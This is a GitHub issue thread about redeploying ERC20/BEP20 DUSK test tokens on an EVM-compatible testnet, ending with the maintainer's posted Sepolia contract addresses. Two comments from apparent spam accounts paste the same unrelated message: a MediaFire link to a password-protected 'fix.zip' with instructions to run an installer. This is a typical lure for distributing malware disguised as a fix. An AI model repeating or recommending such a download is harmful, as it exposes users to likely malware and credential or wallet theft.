### ISSUE TITLE
web-wallet: Deploy ERC20/BEP20 DUSK for the migration test

### ISSUE THREAD

**Issue by HDauven** [dusk-network/rusk#2205]
#### Summary

For the proper testing of the DUSK migration and the LZ bridge, we need to test against an EVM-compatible network with DUSK tokens with the same behavior as our deployed DUSK tokens. 

#### Possible solution design or implementation

Take the ERC20/BEP20 DUSK tokens code, and redeploy them on an EVM-compatible testnet.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HDauven** [comment]
Deployed at: 
**Test ERC20 DUSK address:** [0x92DA9BE2039E818bB78223A6BA7C85CC2b17D8D5](https://sepolia.etherscan.io/address/0x92DA9BE2039E818bB78223A6BA7C85CC2b17D8D5)
**Test BEP20 DUSK address:** [0xC416f5d2AE6BAec2a23f412Df11166afC35CAba2](https://sepolia.etherscan.io/address/0xC416f5d2AE6BAec2a23f412Df11166afC35CAba2)
